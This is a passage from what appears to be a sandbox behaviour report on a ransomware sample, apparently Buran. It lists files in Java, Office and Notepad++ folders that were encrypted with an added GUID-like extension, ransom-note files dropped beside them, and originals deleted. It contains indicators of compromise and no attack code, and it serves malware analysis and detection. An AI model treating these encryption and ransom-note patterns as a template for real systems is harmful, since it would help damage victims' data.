1206 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
1207 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1208 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
1209 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1210 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
1211 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1212 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1213 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
1214 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1215 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
1216 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1217 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
1218 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1219 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
1220 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1221 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
1222 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1223 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
1224 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
1225 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
1226 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1227 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
1228 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1229 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
1230 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1231 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
1232 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1233 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
1234 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1235 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
1236 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1237 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
1238 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1239 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1240 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
1241 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1242 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
1243 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1244 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
1245 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1246 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
1247 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1248 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
1249 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1250 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
1251 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1252 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
1253 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1254 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
1255 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1256 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1257 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
1258 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1259 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
1260 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1261 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
1262 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1263 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
1264 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1265 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
1266 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1267 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
1268 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1269 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
1270 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1271 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
1272 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1273 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1274 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
1275 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1276 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
1277 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access.875B149F-7E2C-F9D8-914C-24C48737255D",
1278 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1279 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
1280 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template.875B149F-7E2C-F9D8-914C-24C48737255D",
1281 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
1282 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1283 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
1284 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template.875B149F-7E2C-F9D8-914C-24C48737255D",
1285 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
1286 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist.875B149F-7E2C-F9D8-914C-24C48737255D",
1287 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1288 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
1289 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs.875B149F-7E2C-F9D8-914C-24C48737255D",
1290 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
1291 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts.875B149F-7E2C-F9D8-914C-24C48737255D",
1292 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
1293 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
1294 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
1295 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security.875B149F-7E2C-F9D8-914C-24C48737255D",
1296 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
1297 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
1298 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\trusted.libraries",
1299 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
1300 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1301 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1302 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
1303 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1304 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
1305 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1306 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1307 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
1308 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1309 "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
1310 "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
1311 "C:\\Program Files\\Microsoft Office\\Office15\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1312 "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
1313 "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1314 "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
1315 "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
1316 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
1317 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1318 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1319 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
1320 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1321 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
1322 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1323 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
1324 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1325 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
1326 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1327 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1328 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
1329 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1330 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
1331 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1332 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
1333 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1334 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
1335 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
1336 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
1337 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1338 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
1339 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
1340 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
1341 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
1342 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
1343 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
1344 "C:\\Program Files\\Notepad++\\contextMenu.xml",
1345 "C:\\Program Files\\Notepad++\\contextMenu.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1346 "C:\\Program Files\\Notepad++\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1347 "C:\\Program Files\\Notepad++\\functionList.xml",
1348 "C:\\Program Files\\Notepad++\\functionList.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1349 "C:\\Program Files\\Notepad++\\langs.model.xml",
1350 "C:\\Program Files\\Notepad++\\langs.model.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1351 "C:\\Program Files\\Notepad++\\LICENSE",
1352 "C:\\Program Files\\Notepad++\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D"
1353
1354
1355* Deleted Files:
1356 "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
1357 "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
1358 "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe",
1359 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
1360 "C:\\.doc",
1361 "C:\\.htm",
1362 "C:\\.jpeg",
1363 "C:\\.jpg",
1364 "C:\\.pptx",
1365 "C:\\.txt",
1366 "C:\\.xls",
1367 "C:\\Host.bmp",
1368 "C:\\Host.docx",
1369 "C:\\Host.html",
1370 "C:\\Host.jpeg",
1371 "C:\\Host.jpg",
1372 "C:\\Host.pdf",
1373 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
1374 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
1375 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
1376 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
1377 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
1378 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
1379 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
1380 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
1381 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
1382 "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
1383 "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
1384 "C:\\Program Files\\Java\\jre1.8.0_201\\release",
1385 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
1386 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
1387 "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
1388 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
1389 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
1390 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
1391 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
1392 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
1393 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
1394 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
1395 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
1396 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
1397 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
1398 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
1399 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
1400 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
1401 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
1402 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
1403 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
1404 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
1405 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
1406 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
1407 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
1408 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
1409 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
1410 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
1411 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
1412 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
1413 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
1414 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
1415 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
1416 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
1417 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
1418 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
1419 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
1420 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
1421 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
1422 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
1423 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
1424 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
1425 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
1426 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
1427 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
1428 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
1429 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
1430 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
1431 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
1432 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
1433 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
1434 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
1435 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
1436 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
1437 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
1438 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
1439 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
1440 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
1441 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
1442 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
1443 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
1444 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
1445 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
1446 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
1447 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
1448 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
1449 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
1450 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
1451 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
1452 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
1453 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
1454 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
1455 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
1456 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
1457 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
1458 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
1459 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
1460 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
1461 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
1462 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
1463 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
1464 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
1465 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
1466 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
1467 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
1468 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
1469 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
1470 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
1471 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
1472 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
1473 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
1474 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
1475 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
1476 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
1477 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
1478 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
1479 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
1480 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
1481 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
1482 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
1483 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
1484 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
1485 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
1486 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
1487 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
1488 "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
1489 "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
1490 "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
1491 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
1492 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
